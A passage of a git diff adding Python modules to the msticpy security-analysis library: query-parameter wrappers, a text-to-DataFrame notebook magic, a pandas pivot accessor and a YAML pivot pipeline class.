+    get_timespan: Callable[[], TimeSpan],
+):
+    """
+    Wrap query function in to handle input parameters.
+
+    Parameters
+    ----------
+    func : Callable[[Any], pd.DataFrame]
+        The function to be wrapped
+    func_params : Dict[str, ParamAttrs]
+        Dict of parameters used by `func`
+    param_attrib_map : Dict[str, str]
+        Map of parameter name to entity attribute name.
+    get_timespan : Callable[[], TimeSpan]
+        The function to get the default timespan to use for queries.
+
+    Returns
+    -------
+    Callable[Any, pd.DataFrame]
+        The wrapped query function.
+
+    Notes
+    -----
+    This function wraps the input `func` in two decorators.
+    The first of these (create_data_func_exec) will execute
+    the function once or many times (concat'ing the results) if
+    the inputs are multi-valued.
+
+    The second (in `wrapped_query_func`) handles the function being called
+    wth arg[0] as an entity instance. In this case, it extracts the entity
+    attributes (mapped to query function parameters) and uses those values
+    as the input parameters to the function.
+
+    """
+    # initially wrap the function in a wrapper that actually does
+    # the call to the query function.
+    exec_query_func = _create_data_func_exec(func, func_params)
+
+    # The outer wrapper handles instantiating query parameters at runtime
+    @wraps(func)
+    def wrapped_query_func(*args, **kwargs):
+        """Wrap function to extract and map parameters."""
+        # If time params not specified, add the global ones.
+        time_params = {
+            "start": kwargs.pop("start", get_timespan().start),
+            "end": kwargs.pop("end", get_timespan().end),
+        }
+        # If this is an entity assume it's called as an instance method
+        if args and isinstance(args[0], entities.Entity):
+            value = args[0]
+            param_dict = {
+                param: getattr(value, attrib, None)
+                for param, attrib in param_attrib_map.items()
+                if hasattr(value, attrib)
+            }
+            return exec_query_func(**param_dict, **time_params, **kwargs)
+        return exec_query_func(**time_params, **kwargs)
+
+    return wrapped_query_func
+
+
+def _create_data_func_exec(
+    func: Callable[[Any], pd.DataFrame], func_params: Dict[str, ParamAttrs]
+) -> Callable[[Any], pd.DataFrame]:
+    """
+    Wrap func to issue single or multiple calls to query.
+
+    Parameters
+    ----------
+    func : Callable[[Any], pd.DataFrame]
+        Query function to wrap
+    func_params : Dict[str, ParamAttrs]
+        Dictionary of function parameter definitions
+        for this function.
+
+    Returns
+    -------
+    Callable[[Any], pd.DataFrame]
+        wrapped function.
+
+    Notes
+    -----
+    Query functions have parameters that can accept single values
+    or lists. This wrapper handles these cases depending on the input
+    parameters.
+
+    If the input is multi-values (i.e. a DataFrame or
+    other iterable) and the required parameters accept list values,
+    a single call to the query function is made. If any of the
+    required parameters accept only single values, repeated calls
+    are made to the query function and the results concatenated into
+    a single DataFrame output.
+
+    If the inputs are all single values, a single call is made, as normal.
+
+    """
+
+    @wraps(func)
+    def call_data_query(**kwargs):
+        """Call function handling input params in different formats."""
+        func_kwargs = kwargs.copy()
+
+        # The input is a DataFrame
+        if "data" in kwargs:
+            # If the input is a DF, we might be required to join
+            join_type, left_on, right_on, j_ignore_case = get_join_params(func_kwargs)
+            src_data = kwargs["data"] if join_type else None
+            # Get the results of the query
+            result_df = _exec_query_for_df(func, func_kwargs, func_params, kwargs)
+            if join_type and isinstance(src_data, pd.DataFrame):
+                if left_on and right_on:
+                    # If explicit join keys
+                    return join_result(
+                        input_df=src_data,
+                        result_df=result_df,
+                        left_on=left_on,
+                        right_on=right_on,
+                        how=join_type,
+                        ignore_case=j_ignore_case,
+                    ).drop(columns="src_row_index", errors="ignore")
+                if "src_row_index" in result_df.columns:
+                    # Otherwise merge on index of source
+                    return src_data.merge(
+                        result_df,
+                        left_index=True,
+                        right_on="src_row_index",
+                        how=join_type,
+                    ).drop(columns="src_row_index", errors="ignore")
+
+                warnings.warn(
+                    "Cannot do an index merge on this result set. "
+                    + "Please use an explicit column join using 'left_on' "
+                    + "and 'right_on' join columns."
+                )
+            return result_df.drop(columns="src_row_index", errors="ignore")
+        # The inputs are some mix of simple values and/or iterables.
+        return _exec_query_for_values(func, func_kwargs, func_params, kwargs)
+
+    return call_data_query  # type: ignore
+
+
+def _exec_query_for_df(func, func_kwargs, func_params, parent_kwargs):
+    """Execute `func` for DataFrame inputs."""
+    src_df = func_kwargs.pop("data")
+    parent_kwargs.pop("data")
+    df_iter_params, list_params = _check_df_params_require_iter(
+        func_params,
+        src_df,
+        func_kwargs,
+        **parent_kwargs,
+    )
+
+    if not df_iter_params or df_iter_params.keys() == list_params.keys():
+        # If there are no iter params that are not in the list_params
+        # dict - we're only using list params - we're good to go
+        return func(**list_params, **func_kwargs)
+
+    # Even if we have list params, we can't use both list params and per-row
+    # iteration so ignore these and run queries per row
+    row_results = []
+    # extact the DF subset of df_iter_params columns and iterate over each row
+    for row_index, row in src_df[list(df_iter_params.values())].iterrows():
+        # build a single-line dict of {param1: row_value1...}
+        col_param_dict = {param: row[col] for param, col in df_iter_params.items()}
+        # execute the function for each input row with key-value params from
+        # col-name, col-value supplied as kwargs (along with any other kwargs)
+        row_res_def = func(**col_param_dict, **func_kwargs)
+        row_res_def["src_row_index"] = row_index
+        row_results.append(row_res_def)
+    return pd.concat(row_results, ignore_index=True)
+
+
+def _check_df_params_require_iter(
+    func_params: Dict[str, ParamAttrs],
+    src_df: pd.DataFrame,
+    func_kwargs: Dict[str, Any],
+    **kwargs,
+) -> Tuple[Dict[str, Any], Dict[str, Any]]:
+    """Return params that require iteration and those that don't."""
+    list_params: Dict[str, Any] = {}
+    df_iter_params: Dict[str, Any] = {}
+    for kw_name, arg in kwargs.items():
+        if kw_name in _DEF_IGNORE_PARAM:
+            continue
+        if (
+            arg not in src_df.columns
+            or not isinstance(func_kwargs.get(kw_name), str)
+            or kw_name not in func_params
+        ):
+            # Not intended/usable as a column specification
+            continue
+        col_name = func_kwargs.pop(kw_name)
+        if func_params[kw_name].type == "list":
+            # If the parameter accepts iterable types try to use the
+            # values of that column directly
+            list_params[kw_name] = list(src_df[col_name].values)
+            # But also store it as a param that we might need to iterate through
+        df_iter_params[kw_name] = col_name
+    return df_iter_params, list_params
+
+
+def _exec_query_for_values(func, func_kwargs, func_params, parent_kwargs):
+    """Execute `func` for value (scalar or iterable) inputs."""
+    var_iter_params, simple_params = _check_var_params_require_iter(
+        func_params, func_kwargs, **parent_kwargs
+    )
+
+    if not var_iter_params or var_iter_params.keys() == simple_params.keys():
+        # If there are no iter params that are not in the simple_params
+        # dict - we're only using list params - we're good to go
+        return func(**simple_params, **func_kwargs)
+
+    for param in var_iter_params:
+        simple_params.pop(param, None)
+
+    # Even if we have list params, we can't use both list params and per-row
+    # iteration so ignore these and run queries per row
+    row_results = []
+    # zip the value lists into tuples
+    for row in zip(*(var_iter_params.values())):
+        # build a single-line dict of {param1: row_value1...}
+        col_param_dict = {param: row[idx] for idx, param in enumerate(var_iter_params)}
+        row_results.append(func(**simple_params, **col_param_dict, **func_kwargs))
+    return pd.concat(row_results, ignore_index=True)
+
+
+def _check_var_params_require_iter(
+    func_params: Dict[str, ParamAttrs], func_kwargs: Dict[str, Any], **kwargs
+) -> Tuple[Dict[str, Any], Dict[str, Any]]:
+    """Return params that require iteration and don't."""
+    simple_params: Dict[str, Any] = {}
+    var_iter_params: Dict[str, Any] = {}
+    for kw_name, arg in kwargs.items():
+        if kw_name in _DEF_IGNORE_PARAM:
+            continue
+        func_kwargs.pop(kw_name)
+        if isinstance(arg, str) or not isinstance(arg, abc.Iterable):
+            # treat as scalar/simple type
+            simple_params[kw_name] = arg
+        else:
+            if func_params[kw_name].type == "list":
+                # If the parameter accepts iterable types try to use the
+                # values of that column directly
+                simple_params[kw_name] = list(arg)
+            # but also add it to the list of iterable params
+            var_iter_params[kw_name] = list(arg)
+    return var_iter_params, simple_params
diff --git a/msticpy/datamodel/pivot_magic_core.py b/msticpy/datamodel/pivot_magic_core.py
new file mode 100644
index 000000000..7cb520c99
--- /dev/null
+++ b/msticpy/datamodel/pivot_magic_core.py
@@ -0,0 +1,111 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Txt2df core code."""
+import argparse
+import io
+from typing import Dict, Union
+
+from pkg_resources import parse_version
+import pandas as pd
+from pandas.errors import ParserError
+
+from .._version import VERSION
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+_PD_VER = parse_version(pd.__version__)
+
+
+def _add_parser_args():
+    parser = argparse.ArgumentParser(
+        description="Cell magic to convert cell text to pandas DataFrame",
+        prog="%%txt2df",
+    )
+    parser.add_argument(
+        "--sep",
+        "-s",
+        default=",",
+        required=False,
+        help="Column separator/delimiter to use.",
+    )
+    parser.add_argument(
+        "--name",
+        "-n",
+        default=None,
+        required=False,
+        help="If specified, the DataFrame will be assigned to the named variable.",
+    )
+    parser.add_argument(
+        "--headers",
+        "-e",
+        action="store_true",
+        default=False,
+        help="If supplied, the first line is treated as the header row.",
+    )
+    parser.add_argument(
+        "--keepna",
+        "-k",
+        action="store_true",
+        default=False,
+        help=(
+            "Don't drop columns that are all NA (the default is to drop"
+            + " them, which is useful for data with trailing delimiters.)"
+        ),
+    )
+    return parser
+
+
+def run_txt2df(line, cell, local_ns) -> pd.DataFrame:
+    """Convert cell text to pandas DataFrame."""
+    arg_parser = _add_parser_args()
+    try:
+        line_args = line.split(" ") if line else []
+        args = arg_parser.parse_args(line_args)
+    except argparse.ArgumentError as err:
+        raise AttributeError(
+            "Invalid argument supplied.", "Use --help to see valid arguments."
+        ) from err
+
+    if not cell:
+        return pd.DataFrame()
+    cell_text = io.StringIO(cell)
+    warn_args: Dict[str, Union[str, bool]]
+    if _PD_VER < parse_version("1.3.0"):
+        warn_args = {"warn_bad_lines": True}
+    else:
+        warn_args = {"on_bad_lines": "warn"}
+    try:
+        parsed_df = pd.read_csv(
+            cell_text,
+            header=0 if args.headers else None,
+            prefix=None if args.headers else "column_",
+            sep=args.sep,
+            skipinitialspace=True,
+            skip_blank_lines=True,
+            engine="python",
+            **warn_args,
+        )
+    except ParserError:
+        # try again without headers
+        cell_text = io.StringIO(cell)
+        parsed_df = pd.read_csv(
+            cell_text,
+            sep=args.sep,
+            skipinitialspace=True,
+            skip_blank_lines=True,
+            engine="python",
+            **warn_args,
+        )
+        print(
+            "One or more rows had more columns than specified in first row.",
+            "Ignoring header row.",
+        )
+    if not args.keepna:
+        parsed_df = parsed_df.dropna(axis=1, how="all")
+    if local_ns is not None and args.name:
+        local_ns[args.name] = parsed_df
+    return parsed_df
diff --git a/msticpy/datamodel/pivot_pd_accessor.py b/msticpy/datamodel/pivot_pd_accessor.py
new file mode 100644
index 000000000..3a8789eb8
--- /dev/null
+++ b/msticpy/datamodel/pivot_pd_accessor.py
@@ -0,0 +1,453 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Pandas DataFrame accessor for Pivot functions."""
+import re
+import json
+from json import JSONDecodeError
+from datetime import datetime
+from numbers import Number
+import warnings
+from typing import Callable, Dict, Iterable, Set, Union
+
+import numpy as np
+import pandas as pd
+from IPython import get_ipython
+from IPython.display import HTML, display
+
+from .._version import VERSION
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+def _verbose_out(data, func, st_time, verbose=False, debug=False, **kwargs):
+    """Output verbose or debug info."""
+    end_time = datetime.now()
+
+    if verbose or debug:
+        print(f"{len(data)} rows returned from function {func.__name__}")
+    if debug:
+        print(f"Columns in result from function {func.__name__}:")
+        print(data.columns)
+        print(f"Execution time: {end_time - st_time}")
+        print(f"Parameters: {kwargs}")
+
+
+@pd.api.extensions.register_dataframe_accessor("mp_pivot")
+class PivotAccessor:
+    """Pandas api extension for Pivot functions."""
+
+    def __init__(self, pandas_obj):
+        """Instantiate pivot extension class."""
+        self._df = pandas_obj
+        self._ip = get_ipython()
+
+    def run(self, func: Callable[..., pd.DataFrame], **kwargs) -> pd.DataFrame:
+        """
+        Run a pivot function on the current DataFrame.
+
+        Parameters
+        ----------
+        func : Callable[..., pd.DataFrame]
+            Pivot function to run
+        kwargs:
+            Keyword arguments to pass to `func`.
+            A column specification (e.g. column="src_col_name")
+            is usually the minimum needed.
+            For data queries the `column` keyword must be the
+            name of the the query parameter (e.g. host_name = "src_col_name")
+
+        Returns
+        -------
+        pd.DataFrame
+            The output DataFrame from the function.
+
+        Notes
+        -----
+        You can pass the `join` keyword argument to most
+        pivot functions. Values for join are "inner", "left", "right"
+        or "outer".
+
+        """
+        st_time = datetime.now()
+        verbose = kwargs.pop("verbose", False)
+        debug = kwargs.pop("debug", False)
+        result = self._df.pipe((func, "data"), **kwargs)
+        if verbose or debug:
+            _verbose_out(
+                data=result,
+                func=func,
+                st_time=st_time,
+                verbose=verbose,
+                debug=debug,
+                **kwargs,
+            )
+        return result
+
+    def display(
+        self,
+        title: str = None,
+        cols: Iterable[str] = None,
+        query: str = None,
+        head: int = None,
+    ) -> pd.DataFrame:
+        """
+        Display the DataFrame in the middle of a pipeline.
+
+        Parameters
+        ----------
+        title : str, optional
+            Title to display for the DataFrame, by default None
+        cols : Iterable[str], optional
+            List of columns to display, by default None
+        query : str, optional
+            Query to filter the displayed data, by default None
+            This should be a string executable by the DataFrame.query
+            function
+        head : int, optional
+            Limit the displayed output to `head` rows, by default None
+
+        Returns
+        -------
+        pd.DataFrame
+            Passed through input DataFrame.
+
+        """
+        if title:
+            display(HTML(f"<h3>{title}</h3>"))
+        disp_df = self._df
+        if cols:
+            disp_df = disp_df[cols]
+        if query:
+            disp_df = disp_df.query(query)  # , parser='python', engine='python')
+        if head:
+            disp_df = disp_df.head(head)
+        display(disp_df)
+        return self._df
+
+    def tee(self, var_name: str, clobber: bool = False) -> pd.DataFrame:
+        """
+        Save current dataframe to `var_name` in the IPython user namespace.
+
+        Parameters
+        ----------
+        var_name : str
+            The name of the DF variable to create.
+        clobber : bool, optional
+            Whether to overwrite an existing variable of the same name,
+            by default False
+
+        Returns
+        -------
+        pd.DataFrame
+            Passed through input DataFrame.
+
+        Notes
+        -----
+        This function only works in an IPython/Jupyter notebook environment.
+        It will attempt to create a variable in the user local namespace
+        that references the current state of the DataFrame in the pipeline.
+
+        By default it will not overwrite an existing variable of the same
+        name (specify `clobber=True` to overwrite)
+
+        """
+        if self._ip and var_name:
+            if var_name in self._ip.ns_table["user_local"] and not clobber:
+                warnings.warn(f"Did not overwrite existing {var_name} in namespace")
+            else:
+                self._ip.ns_table["user_local"][var_name] = self._df
+        return self._df
+
+    def tee_exec(self, df_func: str, *args, **kwargs) -> pd.DataFrame:
+        """
+        Run a dataframe method on the dataframe without changing it.
+
+        Parameters
+        ----------
+        df_func : str
+            The name of the function to execute. Accessor methods
+            must be of the form "accessor.method".
+        args : tuple
+            Positional arguments to be passed to the function
+        kwargs : dict
+            Keyword arguments to be passed to the function.
+
+        Returns
+        -------
+        pd.DataFrame
+            Passed through input DataFrame.
+
+        Notes
+        -----
+        This function runs the DataFrame method or accessor function.
+        It does not alter the DataFrame (unless the function does
+        any kind of in-place modification). The function is run and
+        the original input DataFrame is returned.
+
+        """
+        acc_name = func_name = func = None
+        if "." in df_func:
+            acc_name, func_name = df_func.split(".")
+            accessor = getattr(self._df, acc_name, None)
+            if accessor:
+                func = getattr(accessor, func_name, None)
+        else:
+            func = getattr(self._df, df_func, None)
+        if func:
+            # run the function with any additional args
+            func(*args, **kwargs)
+        return self._df
+
+    def filter_cols(
+        self,
+        cols: Union[str, Iterable[str]],
+        match_case: bool = False,
+        sort_cols: bool = False,
+    ) -> pd.DataFrame:
+        """
+        Filter output columns matching names in `cols` expression(s).
+
+        Parameters
+        ----------
+        cols : Union[str, Iterable[str]]
+            Either a string or a list of strings with filter expressions.
+            These can be exact matches for column names, wildcard patterns
+            ("*" matches multiple chars and "?" matches a single char),
+            or regular expressions.
+        match_case: bool, optional
+            Use case-sensitive matching, by default False
+        sort_cols : bool, optional
+            Alphabetically sort column names, by default False
+
+        Returns
+        -------
+        pd.DataFrame
+            The input DataFrame with only columns that match the
+            filtering expressions.
+
+        """
+        curr_cols = self._df.columns
+        filt_cols: Set[str] = set()
+        if isinstance(cols, str):
+            filt_cols.update(_name_match(curr_cols, cols, match_case))
+        elif isinstance(cols, list):
+            for col_filter in cols:
+                filt_cols.update(_name_match(curr_cols, col_filter, match_case))
+        if not filt_cols:
+            raise ValueError("Column filter expression(s) did not match any columns")
+
+        if sort_cols:
+            out_cols = sorted(filt_cols)
+        else:
+            # keep the existing order
+            out_cols = [col for col in curr_cols if col in filt_cols]
+        return self._df[out_cols]
+
+    def filter(
+        self,
+        expr: Union[str, Number],
+        match_case: bool = False,
+        numeric_col: bool = False,
+    ) -> pd.DataFrame:
+        """
+        Filter all columns of DataFrame, return rows with any matches.
+
+        Parameters
+        ----------
+        expr : Union[str, Number]
+            String or regular expression to match or a (partial) number.
+            If `expr` is a string it is matched against any string or object
+            columns using pandas `str.contains(..regex=True)`
+            If `expr` is a number or if `numeric_col` is True, `expr`
+            is converted to a string and matched as a substring of any numeric
+            columns.
+        match_case : bool, optional
+            The match is not case-sensitive by default. Set to True to force
+            case-sensitive matches.
+        numeric_col : bool, optional
+            If `expr` is a numeric string or number this will force a match against
+            only numeric columns, by default False
+
+        Returns
+        -------
+        pd.DataFrame
+            The filtered dataframe
+
+        Raises
+        ------
+        TypeError
+            If `expr` is neither a string or number.
+
+        """
+        if isinstance(expr, str) and not numeric_col:
+            text_cols = self._df.select_dtypes(include=[object, "string"])
+            return self._df[
+                text_cols.apply(
+                    lambda col: col.str.contains(
+                        expr, regex=True, case=match_case, na=False
+                    )
+                ).any(axis=1)
+            ]
+        if isinstance(expr, Number) or numeric_col:
+            num_cols = self._df.select_dtypes(include="number")
+            str_expr = str(expr)
+            return self._df[
+                num_cols.apply(
+                    lambda col: col.astype("string").str.contains(str_expr, regex=True)
+                ).any(axis=1)
+            ]
+        raise TypeError("expr '{expr}' must be a string or numeric type.")
+
+    def sort(
+        self, cols: Union[str, Iterable[str], Dict[str, str]], ascending: bool = None
+    ) -> pd.DataFrame:
+        """
+        Sort output by column expression.
+
+        Parameters
+        ----------
+        cols : Union[str, Iterable[str], Dict[str, str]]
+            If this is a string, then this should be a column name expression. A column name
+            expression is either a column name, a case-insenstive column name or a
+            regular expression to match one or more column names.
+            Each column name expression can be of
+            the format `col_name_expr:desc` to sort descending (`col_name_expr:asc` is the default).
+            The col_name can also be a regular expression or partial column name.
+            If this is a list, then each element should be a column name expression
+            with an optional ':asc' or ':desc' suffix.
+            If this is a dict, then the keys should be column name expressions and the
+            values bools indication 'ascending' (True) or 'descending' (False) sort.
+        ascending : [type], optional
+            Overrides any ordering specified for individual columns and sorts
+            'ascending' if True or 'descending' if False. If not supplied and no
+            column-specific ordering is supplied it sorts ascending.
+
+        Returns
+        -------
+        pd.DataFrame
+            The sorted DataFrame
+
+        Raises
+        ------
+        ValueError
+            One or more column expressions matched no column name in the input.
+
+        """
+        if isinstance(cols, dict):
+            col_dict = cols
+        else:
+            if isinstance(cols, str):
+                col_list = [col.strip() for col in cols.split(",")]
+            else:
+                col_list = list(cols)
+            col_dict = {
+                col.split(":")[0].strip(): not col.casefold().endswith(":desc")
+                for col in col_list
+            }
+
+        sort_cols = {}
+        # create case-insensitive mapping for DF cols
+        df_cols = {col.casefold(): col for col in self._df.columns}
+        for col in col_dict:
+            # Use case-matched name, if available
+            if col in self._df.columns:
+                sort_cols[col] = col_dict[col]
+                continue
+            # Look for case-insensitive match
+            df_col = df_cols.get(col.casefold())
+            if df_col:
+                sort_cols[col] = col_dict[col]
+                continue
+            # look for regex matches for col name
+            df_match_cols = [
+                df_cols[s_col]
+                for s_col in df_cols
+                if re.match(col, s_col, re.IGNORECASE)
+            ]
+            # we might get multiple matches
+            if df_match_cols:
+                sort_cols.update({df_col: col_dict[col] for df_col in df_match_cols})
+                continue
+            raise ValueError(
+                f"'{col}' column in sort list did not match any columns in input data."
+            )
+        # create the ascending parameter
+        asc_param = ascending if ascending is not None else list(sort_cols.values())
+        return self._df.sort_values(list(sort_cols.keys()), ascending=asc_param)
+
+    def list_to_rows(self, cols: Union[str, Iterable[str]]) -> pd.DataFrame:
+        """
+        Expand a list column to individual rows.
+
+        Parameters
+        ----------
+        cols : Union[str, Iterable[str]]
+            The columns to be expanded.
+
+        Returns
+        -------
+        pd.DataFrame
+            The expanded DataFrame
+
+        """
+        orig_cols = self._df.columns
+        data = self._df
+        if isinstance(cols, str):
+            cols = [cols]
+        for col in cols:
+            item_col = f"{col}_list_item$$"
+            ren_col = {item_col: col}
+            data = (
+                pd.DataFrame(data[col].to_list(), index=data.index)
+                .replace([None], np.nan)  # convert any Nones to NaN
+                .merge(data, right_index=True, left_index=True)
+                .melt(id_vars=orig_cols, value_name=item_col)
+                .dropna(subset=[item_col])  # get rid of rows with NaNs in this col
+                .drop([col, "variable"], axis=1)
+                .rename(columns=ren_col)
+            )
+        return data
+
+    def parse_json(self, cols: Union[str, Iterable[str]]) -> pd.DataFrame:
+        """
+        Convert JSON string columns to Python types.
+
+        Parameters
+        ----------
+        cols : Union[str, Iterable[str]]
+            Column or interable of columns to process
+
+        Returns
+        -------
+        pd.DataFrame
+            Processed dataframe
+
+        """
+        if isinstance(cols, str):
+            cols = [cols]
+        data = self._df
+        for col in cols:
+            col_parsed = f"{col}_parsed"
+            data[col_parsed] = data[col].apply(_json_safe_conv)
+            data = data.drop([col], axis=1).rename(columns={col_parsed: col})
+        return data
+
+
+def _name_match(cur_cols: Iterable[str], col_filter, match_case):
+    col_filter = re.sub(r"[^.]\*", ".*", col_filter)
+    col_filter = re.sub(r"[^.]\?", ".?", col_filter)
+    regex_opts = [re.IGNORECASE] if not match_case else []
+    return {col for col in cur_cols if re.match(col_filter, col, *regex_opts)}
+
+
+def _json_safe_conv(val):
+    if val:
+        try:
+            return json.loads(val)
+        except (TypeError, JSONDecodeError):
+            pass
+    return val
diff --git a/msticpy/datamodel/pivot_pipeline.py b/msticpy/datamodel/pivot_pipeline.py
new file mode 100644
index 000000000..2e517efcd
--- /dev/null
+++ b/msticpy/datamodel/pivot_pipeline.py
@@ -0,0 +1,335 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Pivot pipeline class."""
+from collections import namedtuple
+from typing import Any, Dict, Iterable, List, Optional
+
+import attr
+import pandas as pd
+import yaml
+from attr import Factory
+from tqdm.auto import tqdm
+
+from .._version import VERSION
+from . import entities
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+_STEP_TYPES = {
+    "pivot": "mp_pivot.run",
+    "pivot_display": "mp_pivot.display",
+    "pivot_tee": "mp_pivot.tee",
+    "pivot_tee_exec": "mp_pivot.tee_exec",
+    "pd_accessor": None,
+}
+
+PipelineExecStep = namedtuple(
+    "PipelineExecStep", "accessor, pos_params, params, text, comment"
+)
+
+
+@attr.s(auto_attribs=True)
+class PipelineStep:
+    """Pivot pipeline step class."""
+
+    name: str
+    step_type: str = attr.ib(validator=attr.validators.in_(_STEP_TYPES))
+    function: Optional[str] = None
+    entity: Optional[str] = None
+    comment: Optional[str] = None
+    pos_params: List[str] = Factory(list)
+    params: Dict[str, Any] = Factory(dict)
+
+    def get_exec_step(self) -> PipelineExecStep:
+        """
+        Return the executable step details.
+
+        Returns
+        -------
+        PipelineExecStep
+            Named tuple with the following fields
+            accessor - the name of the pandas DataFrame accessor function
+            params - parameters to be passed to the function
+            text - the text representation of the accessor + params
+            comment - optional comment that can be used by the pipeline
+            builder to add Python comments to output.
+
+        """
+        if self.step_type not in _STEP_TYPES:
+            raise TypeError(f"Invalid step type {self.step_type}")
+
+        mp_func = _STEP_TYPES[self.step_type]
+        accessor = mp_func
+        params = self.params
+        func_text = f".{mp_func}({self._get_param_string()})"
+
+        if self.step_type == "pivot":
+            _, func = _get_entity_and_pivot(self.entity, self.function)
+            func_text = (
+                f".{mp_func}({self.entity}.{self.function}, {self._get_param_string()})"
+            )
+            params = {"func": func, **(self.params)}
+        elif self.step_type == "pivot_tee_exec":
+            func_text = f".{mp_func}('{self.function}', {self._get_param_string()})"
+            params = {"df_func": self.function, **(self.params)}
+        elif self.step_type == "pd_accessor":
+            func_text = f".{self.function}({self._get_param_string()})"
+            accessor = self.function
+
+        return PipelineExecStep(
+            accessor=accessor,
+            pos_params=self.pos_params,
+            params=params,
+            text=func_text,
+            comment=self.comment,
+        )
+
+    # pylint: disable=no-member, not-an-iterable
+    def _get_param_string(self) -> str:
+        """Return text representation of keyword params."""
+        pos_params = [
+            f"'{param}'" if isinstance(param, str) else str(param)
+            for param in self.pos_params
+        ]
+        params_str = [
+            f"{p_name}='{p_val}'"
+            for p_name, p_val in self.params.items()
+            if isinstance(p_val, str)
+        ]
+        params_other = [
+            f"{p_name}={p_val}"
+            for p_name, p_val in self.params.items()
+            if not isinstance(p_val, str)
+        ]
+        return ", ".join(pos_params + params_str + params_other)
+
+    # pylint: enable=no-member, not-an-iterable
+
+
+def _get_entity_and_pivot(entity_name, func_name):
+    """Return the entity and pivot function as objects."""
+    entity = getattr(entities, entity_name)
+    func_name_path = func_name.split(".")
+    obj = entity
+    for path in func_name_path:
+        obj = getattr(obj, path)
+    return entity, obj
+
+
+def _get_pd_accessor_func(data, df_func):
+    """Return the function accessor `df_func` for the DataFrame `df`."""
+    acc_name = func_name = func = None
+    if "." in df_func:
+        acc_name, func_name = df_func.split(".")
+        accessor = getattr(data, acc_name, None)
+        if accessor:
+            func = getattr(accessor, func_name, None)
+    else:
+        func = getattr(data, df_func, None)
+    if func:
+        # run the function with any additional args
+        return func
+    return None
+
+
+class Pipeline:
+    """Pivot pipeline."""
+
+    def __init__(
+        self,
+        name: str,
+        description: Optional[str] = None,
+        steps: Optional[Iterable[PipelineStep]] = None,
+    ):
+        """
+        Create Pipeline instance.
+
+        Parameters
+        ----------
+        name : str
+            The pipeline name.
+        description : Optional[str]
+            The pipeline description, by default None.
+        steps : Optional[Iterable[PipelineStep]]
+            Pipeline steps, by default None.
+
+        """
+        self.name = name
+        self.description = description
+        self.steps: List[PipelineStep] = []
+        if steps:
+            for step in steps:
+                self.steps.append(step)
+
+    def __repr__(self) -> str:
+        """
+        Return string representation of pipeline.
+
+        Returns
+        -------
+        str
+            string representation of pipeline
+
+        """
+        step_repr = "\n  ".join(str(step) for step in self.steps)
+        return (
+            f"Pipeline(name='{self.name}', description='{self.description}', "
+            + f"steps=[{step_repr}])"
+        )
+
+    @classmethod
+    def parse_pipeline(cls, pipeline: Dict[str, Dict[str, Any]]) -> "Pipeline":
+        """
+        Parse single pipeline from dictionary.
+
+        Parameters
+        ----------
+        pipeline : Dict[str, Dict[str, Any]]
+            Single pipeline as a dictionary:
+            {name: {pipeline_dict...}}.
+
+        Returns
+        -------
+        Pipeline
+            The pivot pipeline.
+
+        Raises
+        ------
+        ValueError
+            The dictionary could not be parsed as a pipeline.
+
+        """
+        pl_name, pl_dict = next(iter(pipeline.items()))
+        if pl_dict and isinstance(pl_dict, dict):
+            steps = [PipelineStep(**step) for step in pl_dict.get("steps", [])]
+            return cls(
+                name=pl_name, description=pl_dict.get("description"), steps=steps
+            )
+        raise ValueError("Dictionary could not be parsed.")
+
+    @staticmethod
+    def parse_pipelines(pipelines: Dict[str, Dict[str, Any]]) -> Iterable["Pipeline"]:
+        """
+        Parse dict of pipelines.
+
+        Parameters
+        ----------
+        pipelines : Dict[str, Dict[str, Any]]
+            Dict of pipelines.
+
+        Yields
+        ------
+        Pipeline
+            Iterable of pipeline instances
+
+        """
+        for p_name, pipeline in pipelines.get("pipelines", {}).items():
+            yield Pipeline.parse_pipeline({p_name: pipeline})
+
+    @classmethod
+    def from_yaml(cls, yml_str: str) -> Iterable["Pipeline"]:
+        """
+        Parse pipelines from yaml string.
+
+        Parameters
+        ----------
+        yml_str : str
+            Yaml dict of pipelines.
+
+        Yields
+        ------
+        Pipeline
+            Iterable of pipeline instances
+
+        """
+        pipelines = yaml.safe_load(yml_str)
+        yield from cls.parse_pipelines(pipelines)
+
+    def to_yaml(self) -> str:
+        """
+        Return yaml representation of pipeline.
+
+        Returns
+        -------
+        str
+            Pipeline as yaml.
+
+        """
+        steps = [attr.asdict(step) for step in self.steps]
+        return yaml.dump({self.name: {"description": self.description, "steps": steps}})
+
+    def run(
+        self, data: pd.DataFrame, verbose: bool = True, debug: bool = False
+    ) -> Optional[Any]:
+        """
+        Run the pipeline on the supplied DataFrame.
+
+        Parameters
+        ----------
+        data : pd.DataFrame
+            Input DataFrame for pipeline
+        verbose : bool, optional
+            If True, report progress, by default True
+        debug : bool, optional
+            If True, report more detailed progress, by default False
+
+        Returns
+        -------
+        Any
+            The output of the last stage of the pipeline
+
+        """
+        pipeline_result = data
+        pipe_linesteps = tqdm(self.steps, desc="Steps") if verbose else self.steps
+        for step in pipe_linesteps:
+            exec_action = step.get_exec_step()
+            if verbose:
+                print("step =", step.name, "\n", exec_action)
+            if not isinstance(pipeline_result, pd.DataFrame):
+                print(
+                    "Output type from previous step is {type(pipeline_result}",
+                    "This is not a valid input type for the next stage.",
+                )
+                break
+            exec_kws = {"verbose": verbose, "debug": debug}
+            func = _get_pd_accessor_func(pipeline_result, exec_action.accessor)
+            pipeline_result = func(
+                *exec_action.pos_params, **exec_action.params, **exec_kws
+            )
+
+        return pipeline_result
+
+    def print_pipeline(self, df_name: str = "input_df", comments: bool = True) -> str:
+        """
+        Return the pipeline as text that can be executed in Python.
+
+        Parameters
+        ----------
+        df_name : str, optional
+            Name of the input dataframe to be used in the returned
+            code, by default "input_df"
+        comments : bool, optional
+            If True show step comments, by default True
+
+        Returns
+        -------
+        str
+            The executable pipeline text.
+
+        """
+        step_list = []
+        if comments:
+            step_list.append(f"# {self.description or self.name}")
+        step_list.extend(["(", f"    {df_name}"])
